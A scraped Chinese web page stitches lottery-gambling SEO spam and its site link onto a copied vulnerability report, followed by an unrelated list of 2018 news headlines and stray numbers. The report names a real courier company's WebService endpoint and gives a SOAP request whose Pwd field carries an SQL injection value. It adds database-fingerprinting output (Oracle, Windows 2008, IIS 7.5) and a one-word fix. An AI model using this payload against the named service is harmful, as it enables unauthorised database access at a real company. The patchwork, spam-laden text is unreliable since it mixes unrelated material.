我们来自五湖四海,不为别的,只因有共同的爱好,为中国互联网发展出一分力!
领航时时彩重庆版

时时彩组三出现规律:中通速递WebService注入一枚

2014年01月18日02:21 阅读: 33551 次

领航时时彩重庆版 www.9nwl5.cn 标签: 数据库, 网站建设, 网络技术, 网络安全, windows, QQ技术, Linux, 源码, 网站安全, 系统安全, 企业安全, 信息技术, 安全软件, 软件开发, web开发, 移动开发, 电子书, 下载, 动画教程, 论坛, 反黑客, 网管技术, 等级考试

接口地址:
 
//api.zto.cn/WebService.asmx?wsdl
 
Pwd参数存在SQL注入漏洞
 
 
 
<SOAP-ENV:Header/>

     <SOAP-ENV:Body>

        <urn:Search>

           <urn:Userid>1</urn:Userid>

           <urn:Pwd>-1'</urn:Pwd>

           <urn:SrtjobNo>1</urn:SrtjobNo>

        </urn:Search>

     </SOAP-ENV:Body>

</SOAP-ENV:Envelope>

 

版本信息:
 
[INFO] the back-end DBMS is Oracle

web server operating system: Windows 2008

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5

back-end DBMS: Oracle

 

 
 
 
 
oracle库名:
 
 
 
主库应该在这。。就不继续了。。
修复方案:
过滤~
分享到: 更多
©2018 安全焦点 版权所有.

  • 奚国华委员:新兴际华将党建六大优势转化为发展优势 2018-12-06
  • 创业女青年哈丽娟:世界是自己的 与他人没关系 2018-12-06
  • 移植2胚怀5胎 一针减3化风险 十堰市人民医院再创生命奇迹 2018-11-06
  • 首届妈祖信俗“立德”论坛成功举办 2018-10-25
  • 郧西男孩两条腿“长”在一起 十堰市人民医院手术整形帮他迈开双腿 2018-10-25
  • 重磅 江西省委副书记李炳军同志任省委党校校长 2018-10-19
  • 商务部新闻发言人对美白宫6月18日声明发表谈话 2018-10-12
  • 从献血条件,看看你的身体是否达标 2018-09-26
  • 全国“非遗”保护工作先进名单公布 2018-09-26
  • 储大同 中国医学科学院肿瘤医院首席科学家 2018-08-15
  • 【理上网来·喜迎十九大】扶贫也创新!十八大以来年均减贫人数超1300万 获历史突破 2018-08-15
  • 开创美丽中国建设新局面 2018-08-13
  • 毛泽东三游故宫看了些什么 2018-08-13
  • 独家视频:新时代来啦! 2018-08-12
  • 旅游市场再创佳绩端午假期河北接待游客2026.77万 揽金147.79亿 2018-08-12
  • 666| 918| 341| 784| 194| 139| 820| 940| 655| 7|